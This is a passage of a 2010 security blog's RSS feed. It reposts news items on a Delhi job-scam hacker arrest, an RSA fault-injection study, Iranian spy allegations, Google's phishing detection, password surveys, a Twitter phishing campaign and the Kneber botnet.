<p>Apr 03, 2010</p>
<p><a href="http://www.indianexpress.com/news/hacker-held-for-duping-job-aspirants/599464/" target="_blank">http://www.indianexpress.com/news/hacker-held-for-duping-job-aspirants/599464/</a></p>
<p>The Delhi Police arrested a professional hacker on Friday who led a gang which allegedly duped hundreds of youths by promising them jobs as technicians and airline crew.</p>
<p>Police identified the accused as Amritesh and said they are raiding several places in Delhi to nab his associates.</p>
<p>Amritesh, the police said, had hacked a popular job website — he would find out probable victims and stay in touch with them until they paid money for the promised job.</p>
<p>Police sources said at least 25 students who were cheated by the gang approached the Safdarjung Enclave police on Friday, alleging they have been duped of lakhs of rupees.</p>
<p>Abhinav, a student, said, &#8220;Amritesh promised me a job with a popular airline for Rs 80,000. He even gave me joining letters printed on the airlines&#8217; letterheads and affidavits. He also arranged meetings with a person who claimed to be the HR head of the airline. He said I could join work in January.&#8221;</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-540"></span></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/04/06/hacker-held-for-duping-job-aspirants/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>1024-bit RSA encryption cracked by carefully starving CPU of electricity</title>
		<link>http://techblog.cyberphunkz.com/2010/04/04/1024-bit-rsa-encryption-cracked-by-carefully-starving-cpu-of-electricity/</link>
		<comments>http://techblog.cyberphunkz.com/2010/04/04/1024-bit-rsa-encryption-cracked-by-carefully-starving-cpu-of-electricity/#comments</comments>
		<pubDate>Sun, 04 Apr 2010 14:10:17 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Buildings]]></category>
		<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[funny]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Military]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[ethical hacking]]></category>
		<category><![CDATA[RSA]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=533</guid>
		<description><![CDATA[By Sean Hollister Mar 9th 2010 http://www.engadget.com/2010/03/09/1024-bit-rsa-encryption-cracked-by-carefully-starving-cpu-of-ele/ Since 1977, RSA public-key encryption has protected privacy and verified authenticity when using computers, gadgets and web browsers around the globe, with only the most brutish of brute force efforts (and 1,500 years of processing time) felling its 768-bit variety earlier this year. Now, three eggheads (or Wolverines, &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/04/04/1024-bit-rsa-encryption-cracked-by-carefully-starving-cpu-of-electricity/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>By Sean Hollister</p>
<p>Mar 9th 2010</p>
<p><a href="http://www.engadget.com/2010/03/09/1024-bit-rsa-encryption-cracked-by-carefully-starving-cpu-of-ele/" target="_blank">http://www.engadget.com/2010/03/09/1024-bit-rsa-encryption-cracked-by-carefully-starving-cpu-of-ele/</a></p>
<p>Since 1977, RSA public-key encryption has protected privacy and verified authenticity when using computers, gadgets and web browsers around the globe, with only the most brutish of brute force efforts (and 1,500 years of processing time) felling its 768-bit variety earlier this year. Now, three eggheads (or Wolverines, as it were) at the University of Michigan claim they can break it simply by tweaking a device&#8217;s power supply. By fluctuating the voltage to the CPU such that it generated a single hardware error per clock cycle, they found that they could cause the server to flip single bits of the private key at a time, allowing them to slowly piece together the password. With a small cluster of 81 Pentium 4 chips and 104 hours of processing time, they were able to successfully hack 1024-bit encryption in OpenSSL on a SPARC-based system, without damaging the computer, leaving a single trace or ending human life as we know it. That&#8217;s why they&#8217;re presenting a paper at the Design, Automation and Test conference this week in Europe, and that&#8217;s why &#8212; until RSA hopefully fixes the flaw &#8212; you should keep a close eye on your server room&#8217;s power supply.</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-533"></span></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/04/04/1024-bit-rsa-encryption-cracked-by-carefully-starving-cpu-of-electricity/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Iran busts US-linked internet spy gang</title>
		<link>http://techblog.cyberphunkz.com/2010/04/04/iran-busts-us-linked-internet-spy-gang/</link>
		<comments>http://techblog.cyberphunkz.com/2010/04/04/iran-busts-us-linked-internet-spy-gang/#comments</comments>
		<pubDate>Sun, 04 Apr 2010 14:07:02 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Military]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[iran]]></category>
		<category><![CDATA[spy]]></category>
		<category><![CDATA[spying]]></category>
		<category><![CDATA[usa]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/2010/04/04/iran-busts-us-linked-internet-spy-gang/</guid>
		<description><![CDATA[March 2010 http://news.webindia123.com/news/articles/Science/20100314/1464200.html Iran claimed to have busted a spy racket allegedly linked with the US intelligence agency CIA and arrested 30 people for operating an internet network to gather secret data related to Iran&#8217;s nuclear scientists. The Judiciary said Saturday it has dismantled a US-backed cyber network, which was set up to gather information &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/04/04/iran-busts-us-linked-internet-spy-gang/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>March 2010</p>
<p><a href="http://news.webindia123.com/news/articles/Science/20100314/1464200.html" target="_blank">http://news.webindia123.com/news/articles/Science/20100314/1464200.html</a></p>
<p>Iran claimed to have busted a spy racket allegedly linked with the US intelligence agency CIA and arrested 30 people for operating an internet network to gather secret data related to Iran&#8217;s nuclear scientists.</p>
<p>The Judiciary said Saturday it has dismantled a US-backed cyber network, which was set up to gather information on Iran&#8217;s nuclear scientists and spread unrest after the presidential election.</p>
<p>The nexus was formed by anti-Iran groups, including the terrorist Mojahedin Khalq Organisation (MKO), the Judiciary said in a statement, adding that 30 suspects have been arrested.</p>
<p>According to Iranian authority, during former US President George W Bush&#8217;s regime, a new campaign in the intelligence front &#8211; the &#8220;cyber war&#8221; &#8211; was set up to engage Iran, with the help of the MKO, pro-monarchy groups and other anti-Iran cells.</p>
<p>&#8220;Iran proxy&#8221;, which was one of the main projects of the campaign, received $50 million from the CIA and the US State Department, the statement said.</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-532"></span></p>
<p>The program, which allowed Iranians bypass the state&#8217;s filtering system and access the internet, was designed to &#8220;obtain personal and family information&#8221; of its users and pass them on to US spy agencies.</p>
<p>Another major project was a network of &#8220;human rights activists&#8221;, which was led by Keyvan Rafiei, Jamal Hosseini and Ahmad Batebi, it said.</p>
<p>The network was tasked with recruiting people and sending them to an MKO camp in Iraq and other countries, where they would receive training, the statement said.</p>
<p>It said the network was also in close cooperation with &#8220;Lawyers Committee&#8221; and &#8220;Harana News service&#8221;, Press TV reported.</p>
<p>The network, according to the confession of its arrested members, was also tasked with inviting people to attend rallies and riots after the presidential election in June.</p>
<p>The Judiciary said that the International Criminal Police Organisation (INTERPOL) has been briefed on the situation and about the key members of the group, who operate the racket from the US.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/04/04/iran-busts-us-linked-internet-spy-gang/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How Google detect phishing site</title>
		<link>http://techblog.cyberphunkz.com/2010/04/04/how-google-detect-phishing-site/</link>
		<comments>http://techblog.cyberphunkz.com/2010/04/04/how-google-detect-phishing-site/#comments</comments>
		<pubDate>Sun, 04 Apr 2010 13:31:34 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[google hacking]]></category>
		<category><![CDATA[phishing]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=543</guid>
		<description><![CDATA[02 April 2010. http://www.net-security.org/secworld.php?id=9096&#38;utm_source=feedburner&#38;utm_medium=feed&#38;utm_campaign=Feed%3A+HelpNetSecurity+%28Help+Net+Security%29 Google analyzes millions of pages per day when searching for phishing behavior. This kind of activity is, of course, not done by people but by computers. The computers are programmed to look for certain things that will identify the page as a phishing site. Those things are actually the same things &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/04/04/how-google-detect-phishing-site/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>02 April 2010.</p>
<p><a href="http://www.net-security.org/secworld.php?id=9096&amp;utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed%3A+HelpNetSecurity+%28Help+Net+Security%29" target="_blank">http://www.net-security.org/secworld.php?id=9096&amp;utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed%3A+HelpNetSecurity+%28Help+Net+Security%29</a></p>
<p>Google analyzes millions of pages per day when searching for phishing behavior. This kind of activity is, of course, not done by people but by computers.</p>
<p>The computers are programmed to look for certain things that will identify the page as a phishing site. Those things are actually the same things that users should check when evaluating if a page is legitimate or not.</p>
<p>According to a post on Google&#8217;s official online security blog, the first step is looking at the URL- Does it contain words like &#8220;login&#8221; or &#8220;banking&#8221; or trademarks of the phishing target? Does it use an IP address for its hostname? Does it have a large number of host components, making the address unusually long? If the answer is yes to all of these questions, the page could be a phishing one.</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-543"></span></p>
<p>The second step consists of analyzing the page &#8211; Does it contain a password field? Does the majority of the links point to the phishing target so that the phishing pages functions as the legitimate one would? Google&#8217;s computers check also the terms most often used on the page, and a telling terms like &#8220;password&#8221; raises a red flag.</p>
<p>The third step consists of a look-up of the hosting information &#8211; does the institution claim to be based in one country but the webpage is hosted on servers in another country and on a local ISP&#8217;s network? If the answer is yes, chances are high it&#8217;s not a legal site.</p>
<p>Lastly, checking to see whether the page is popular and checking the spam reputation of the domain on which the page is hosted will give you another clue &#8211; phishing pages are usually hosted on domains that have a (bad) reputation when it comes to spam sending.</p>
<p>When all these clues are combined and indicate that the site is likely set up for phishing purposes, it is put on Google&#8217;s blacklist that is used by the browsers to warn the users that they have landed on a malicious page.</p>
<p>&#8220;False positives&#8221; do happen, but they happen once every 10,000 checked pages, and even then it is usually a site set up for some other malicious purpose. The basis on which the classifier is trained to recognize phishing pages is provided by a sample of around ten million analyzed URLs in the last three months and an addition of current features, and it is executed once a day.</p>
<p>Phishers may use a number of techniques to try and bypass this system, but they can&#8217;t escape forever. The more people come to their site, the likelihood of someone recognizing it for what it is and reporting it to Google rises, so it&#8217;s just a matter of time before it gets flagged.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/04/04/how-google-detect-phishing-site/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Weak passwords stored in browsers make hackers happy</title>
		<link>http://techblog.cyberphunkz.com/2010/03/15/weak-passwords-stored-in-browsers-make-hackers-happy/</link>
		<comments>http://techblog.cyberphunkz.com/2010/03/15/weak-passwords-stored-in-browsers-make-hackers-happy/#comments</comments>
		<pubDate>Mon, 15 Mar 2010 12:31:32 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[password]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/2010/03/15/weak-passwords-stored-in-browsers-make-hackers-happy/</guid>
		<description><![CDATA[Insecurity complex still rife shock By John Leyden 30th March 2010 http://www.theregister.co.uk/2010/03/30/password_security_still_pants/ Nearly a quarter of people (23 per cent) polled in a survey by Symantec use their browser to keep tabs on their passwords. A survey of 400 surfers by Symantec also found that 60 per cent fail to change their passwords regularly. Further &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/03/15/weak-passwords-stored-in-browsers-make-hackers-happy/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><strong><em>Insecurity complex still rife shock</em></strong></p>
<p>By John Leyden</p>
<p>30th March 2010</p>
<p><a href="http://www.theregister.co.uk/2010/03/30/password_security_still_pants/" target="_blank">http://www.theregister.co.uk/2010/03/30/password_security_still_pants/</a></p>
<p>Nearly a quarter of people (23 per cent) polled in a survey by Symantec use their browser to keep tabs on their passwords.</p>
<p>A survey of 400 surfers by Symantec also found that 60 per cent fail to change their passwords regularly. Further violating the &#8216;passwords should be treated like toothbrushes&#8217; maxim (changed frequently and not shared), the pollsters also found that a quarter of people have given their passwords to their spouse, while one in 10 people have given their password to a ‘friend’.</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-530"></span></p>
<p>Password choices were also lamentably bad. Twelve of the respondents admitted they used the phrase &#8216;password&#8217; as their, err, password while one in ten used a pet&#8217;s name. The name of a pet might easily be obtained by browsing on an intended target&#8217;s social networking profile.</p>
<p>Eight per cent of the 400 respondents said they used the same password on all their online sites, a shortcoming that means a compromise of one low-sensitivity account hands over access to a victim&#8217;s more sensitive webmail and online banking accounts. The survey respondents came from readers of Symantec&#8217;s Security Response blog, who might be expected to be more security savvy than the general net population, though the survey shows many of them making the same basic errors that crop up time and again in password security surveys.</p>
<p>Symantec has put together its findings together with a list of suggestions for picking better passwords, a basic but woefully overlooked security precaution, in a blog post at  <a href="http://www.symantec.com/connect/pt-br/blogs/password-survey-results" target="_blank">http://www.symantec.com/connect/pt-br/blogs/password-survey-results</a>.</p>
<p>The net security firm advised computer users to pick a mix of numbers, letters, punctuation, and symbols when picking passwords. This may be derived from taking a memorable phrase and altering it by replacing characters with symbols, for example. Surfers should avoid personal information, repetition and sequences in passwords, Symantec further recommends.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/03/15/weak-passwords-stored-in-browsers-make-hackers-happy/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>All hacking attempts on Indian govt computers failed</title>
		<link>http://techblog.cyberphunkz.com/2010/03/02/all-hacking-attempts-on-indian-govt-computers-failed/</link>
		<comments>http://techblog.cyberphunkz.com/2010/03/02/all-hacking-attempts-on-indian-govt-computers-failed/#comments</comments>
		<pubDate>Tue, 02 Mar 2010 16:27:52 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[India]]></category>
		<category><![CDATA[Military]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[fail]]></category>
		<category><![CDATA[indian government]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=528</guid>
		<description><![CDATA[IANS / PTI The Hindu March 2010 http://beta.thehindu.com/business/article193044.ece There have been attempts to hack into the government computer network, but till date there has been no loss of vital information, says Minister of State for Communication and Information Technology Sachin Pilot. “Yes, there have been attempts but I can categorically say that not one attempt &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/03/02/all-hacking-attempts-on-indian-govt-computers-failed/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>IANS / PTI</p>
<p>The Hindu</p>
<p>March 2010</p>
<p><a href="http://beta.thehindu.com/business/article193044.ece" target="_blank">http://beta.thehindu.com/business/article193044.ece</a></p>
<p>There have been attempts to hack into the government computer network, but till date there has been no loss of vital information, says Minister of State for Communication and Information Technology Sachin Pilot.</p>
<p>“Yes, there have been attempts but I can categorically say that not one attempt has been successful,” the minister said. “The government&#8217;s computer network system, maintained by the National Informatics Centre, is highly efficient,” Mr. Pilot told IANS in an interview.</p>
<p>Earlier this year, hackers tried to penetrate government computers in vital ministries including the office of the National Security Adviser (NSA). These attacks, officials said, originated in China.</p>
<p>According to the Computer Emergency Response Team, a cyber security advisory and referral agency of the Department of Information Technology, 570 Indian web sites were defaced by hackers during January this year, against 271 during the like month of last year.</p>
<p>During the whole of last year, a total of 6,023 cases of defacement were reported.</p>
<p>The agency also said that during January, out of 246 cyber-security incidents, as 63 percent related to spamming, 18 to phishing, 8 percent to malicious viruses, 76 percent to unauthorised scanning and the rest to other categories.</p>
<p>Former NSA M.K. Narayanan, who is currently West Bengal governor, had stated that his office and other government departments were targeted on the same date that U.S. Defence, Finance and Technology companies, including Google, reported cyber attacks from China.</p>
<p>The hackers had sent an e-mail with a PDF attachment containing a Trojan virus. But the virus, which allows hackers to download or delete files, was detected and officials were told not to log on until it was eliminated.</p>
<p>Mr. Pilot pointed out that such hackers were usually scanning the entire system to find weak spots. &#8220;But our people are very efficient and well trained. Safeguards have ensured that national security has not been breached.&#8221;</p>
<p>The Ministry of External Affairs and Indian embassies have instituted stringent protocol on the use of e-mails by serving officers, which includes frequently changing passwords and using e-mails only for routine communication.</p>
<p>Besides, the ministry has instituted a periodic security review of all computers to ward off cyber threats.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/03/02/all-hacking-attempts-on-indian-govt-computers-failed/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Spies and hackers exploit world cyber rule void</title>
		<link>http://techblog.cyberphunkz.com/2010/02/25/spies-and-hackers-exploit-world-cyber-rule-void/</link>
		<comments>http://techblog.cyberphunkz.com/2010/02/25/spies-and-hackers-exploit-world-cyber-rule-void/#comments</comments>
		<pubDate>Thu, 25 Feb 2010 07:14:19 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Military]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[china]]></category>
		<category><![CDATA[google hacking]]></category>
		<category><![CDATA[iran]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=525</guid>
		<description><![CDATA[William Maclean, Security Correspondent Reuters Feb 22, 2010 http://www.reuters.com/article/idUKTRE61L37B20100222 LONDON (Reuters) &#8211; The best weapon against the online thieves, spies and vandals who threaten global business and security would be international regulation of cyberspace. Luckily for them, such cooperation does not yet exist. Better still, from a hacker&#8217;s perspective, such a goal is not a &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/02/25/spies-and-hackers-exploit-world-cyber-rule-void/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>William Maclean, Security Correspondent</p>
<p>Reuters</p>
<p>Feb 22, 2010</p>
<p><a href="http://www.reuters.com/article/idUKTRE61L37B20100222" target="_blank">http://www.reuters.com/article/idUKTRE61L37B20100222</a></p>
<p>LONDON (Reuters) &#8211; The <strong>best weapon against the online thieves, spies and vandals</strong> who threaten global business and security would be <strong>international regulation of cyberspace</strong>.</p>
<p><strong>Luckily for them, such cooperation does not yet exist.</strong></p>
<p>Better still, from a hacker&#8217;s perspective, such a goal is not a top priority for the international community, despite an outcry over hacking and censorship and disputes over cyberspace pitting China and Iran against U.S. firm Google.</p>
<p>Nations are thinking too parochially about their online security to collaborate on crafting global cyber regulation, an EastWest Institute security conference heard last week.</p>
<p>Policy statements from governments around the world are dominated by the need to heighten national cyber defenses. As a result, too many cyber criminals are getting a free ride.</p>
<p>&#8220;Nations are in denial,&#8221; a cyber law expert told Reuters, saying national legislation was of limited use in protecting users of a borderless communications tool.</p>
<p>&#8220;It may take a big shock of an event to wake people out of their complacency, something equal to a 9/11 in cyberspace,&#8221; he said referring to the 2001 coordinated attacks on U.S. cities.</p>
<p>With a quarter of humanity connected to the Internet, cyber crime poses a growing danger to the global economy.</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-525"></span></p>
<p><strong>TARGET THE PERPETRATOR</strong></p>
<p>The FBI tallied $264 million in losses from Internet crime reported by individuals in the United States in 2008 compared to $18 million of losses from 2001: These were probably a fraction of the losses caused to companies and government departments.</p>
<p>The menace extends to many sectors including control systems for manufacturing, utilities and oil refining, since many are now tied to the Internet for convenience and productivity.</p>
<p>A priority for regulators is to find ways of tracking down criminals across borders and ensuring they are punished, a tough task when criminals can use proxy servers to remain anonymous.</p>
<p>&#8220;We cannot postpone the debate until we are in the midst of a catastrophic cyber attack,&#8221; former U.S. Homeland Security Secretary Michael Chertoff told the conference.</p>
<p>&#8220;We must formulate an international strategy and response to cyber attacks that parallels the traditional laws governing the land, sea, and air.&#8221;</p>
<p>Security experts say the ability to conduct disastrous mass cyber attacks is the preserve of some governments, well beyond the capacity of militant guerrilla groups like al Qaeda.</p>
<p>But it cannot be assumed that international organized criminal networks, long practiced at mass online fraud and theft, are not developing an interest in gaining this ability.</p>
<p>&#8220;Cyber crime is a very sophisticated crime with very sophisticated players and it takes a multinational effort to make sure we can enforce the law,&#8221; Dell Services President Peter Altabef told Reuters.</p>
<p>&#8220;Once you have identified who is at fault you really want to make sure, as a deterrent, that you can go to those jurisdictions and enforce the laws on the books.&#8221;</p>
<p>James Stikeleather, Dell Services Chief Technology Officer, told Reuters that tracking own criminals across borders could pose legal issues for drafters of multilateral regulation.</p>
<p>Giving an example, he said the more companies added the technology needed to give investigators the ability to attribute a crime, the more users&#8217; privacy and anonymity would be reduced.</p>
<p><strong>&#8220;PLAYING WITH FIRE&#8221;</strong></p>
<p>&#8220;Probably the sticking point among the governments will be &#8216;where is the appropriate level of attribution versus anonymity or privacy for what people are doing (online)&#8217;.&#8221;</p>
<p>Datuk Mohammed Noor Amin, chairman of the U.N.-affiliated International Multilateral Partnership Against Cyber Threats, said failure to regulate could perpetuate cyber &#8220;failed states.&#8221;</p>
<p>He cited impoverished countries where customers can purchase unregistered SIM cards with mobile Internet capability, giving them the ability to commit online crime such as identify theft against people in rich nations without fear of being traced.</p>
<p>He said it was in the interest of rich nations to help poorer countries develop the capacity to crack down on this kind of abuse, because their own citizens were being targeted.</p>
<p>&#8220;Governments tend to look at their self-interest. But it&#8217;s actually in their own interest to collaborate,&#8221; he said.</p>
<p>Altabef said the growing rate and scale of international cyber attacks threatened to undermine the trust between nations, businesses and individuals that was necessary for economies and societies to act on the basis of the common good.</p>
<p>Complacency was also a problem, delegates said. &#8220;Nations take for granted the Internet is going to be &#8216;on&#8217; for the rest of our lives. It may not necessarily be so,&#8221;.</p>
<p>&#8220;Imagine the Internet being down for two to four weeks,&#8221; he said. This would &#8220;rain disaster&#8221; on online businesses as well as transport, industry and governmental surveillance systems.</p>
<p>&#8220;People have realize the Internet is an integral part of every country, politically, socially and business-wise.&#8221;</p>
<p>&#8220;Not to focus on cybersecurity is playing with fire.&#8221;</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/02/25/spies-and-hackers-exploit-world-cyber-rule-void/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Twitter users hit by phishing attack</title>
		<link>http://techblog.cyberphunkz.com/2010/02/23/twitter-users-hit-by-phishing-attack/</link>
		<comments>http://techblog.cyberphunkz.com/2010/02/23/twitter-users-hit-by-phishing-attack/#comments</comments>
		<pubDate>Tue, 23 Feb 2010 11:08:19 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[alert]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[twitter]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/2010/02/23/twitter-users-hit-by-phishing-attack/</guid>
		<description><![CDATA[BANGALORE: An IT security firm, Sophos, is warning that a major attack against Twitter users last weekend that was designed to steal passwords and use hijacked accounts to spread moneymaking spam campaigns. The attack, which is ongoing, began on Saturday, as Twitter users found members of the micro-blogging network had posted messages disguised as humorous &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/02/23/twitter-users-hit-by-phishing-attack/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>BANGALORE: An IT security firm, Sophos, is warning that a major attack against Twitter users last weekend that was designed to steal passwords and use hijacked accounts to spread moneymaking spam campaigns.</p>
<table cellspacing="0" cellpadding="0" align="left">
<tbody>
<tr>
<td id="bellyad"></td>
</tr>
</tbody>
</table>
<p>The attack, which is ongoing, began on Saturday, as Twitter users found members of the micro-blogging network had posted messages disguised as humorous inks, but actually aimed to phish passwords credentials from unsuspecting users.</p>
<p>Messages, which began with phrases such as “Lol. this is me??”, “lol, this is funny.”, “Lol. this you?? ” and “ha ha, u look funny on here”, were accompanied with clickable links which redirected users to a fake Twitter login page hosted on a Web site based in China.</p>
<p>Researchers discovered that although the main wave of poisoned messages has been via private direct messages between individual users on Twitter, dangerous links are also being posted in public feeds. This means that innocent users can stumble across the links even if they are not sent it directly, or even if they are not a signed-up user of Twitter.</p>
<p>“Thousands of users being put at risk of having their account broken into,” said Graham Cluley, senior technology consultant at Sophos.</p>
<p>“The cybercriminals behind the attack are creating a zombie network, or botnet, of hacked accounts that they can then abuse to spread spam, distribute malware and steal identities. There’s nothing funny about the LOL attack &#8212; you have to be on your guard against clicking on the dangerous messages. If you’ve fallen for it you must change your Twitter password immediately.”</p>
<p>The phishing campaign appears to be already bearing fruit for the hackers as they are now distributing spam selling herbal Viagra from the compromised accounts.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/02/23/twitter-users-hit-by-phishing-attack/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Kneber botnet virus attacks 75,000 computers worldwide</title>
		<link>http://techblog.cyberphunkz.com/2010/02/19/kneber-botnet-virus-attacks-75000-computers-worldwide/</link>
		<comments>http://techblog.cyberphunkz.com/2010/02/19/kneber-botnet-virus-attacks-75000-computers-worldwide/#comments</comments>
		<pubDate>Fri, 19 Feb 2010 14:44:33 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Military]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[botnet]]></category>
		<category><![CDATA[fbi]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=515</guid>
		<description><![CDATA[DAILY NEWS February 18th 2010 http://www.nydailynews.com/news/2010/02/18/2010-02-18_kneber_botnet_virus_attacks_75000_computers_worldwide_including_us_government_sy.html A new computer virus has infected almost 75,000 computers worldwide &#8211; including 10 U.S. government agencies &#8211; collecting login credentials from online financial, social networking sites and email systems and reporting back to hackers. The virus, dubbed the Kneber botnet, is thought to be the brainchild of an Eastern &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/02/19/kneber-botnet-virus-attacks-75000-computers-worldwide/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>DAILY NEWS</p>
<p>February 18th 2010</p>
<p><a href="http://www.nydailynews.com/news/2010/02/18/2010-02-18_kneber_botnet_virus_attacks_75000_computers_worldwide_including_us_government_sy.html" target="_blank">http://www.nydailynews.com/news/2010/02/18/2010-02-18_kneber_botnet_virus_attacks_75000_computers_worldwide_including_us_government_sy.html</a></p>
<p>A new computer virus has infected almost 75,000 computers worldwide &#8211; including 10 U.S. government agencies &#8211; collecting login credentials from online financial, social networking sites and email systems and reporting back to hackers.</p>
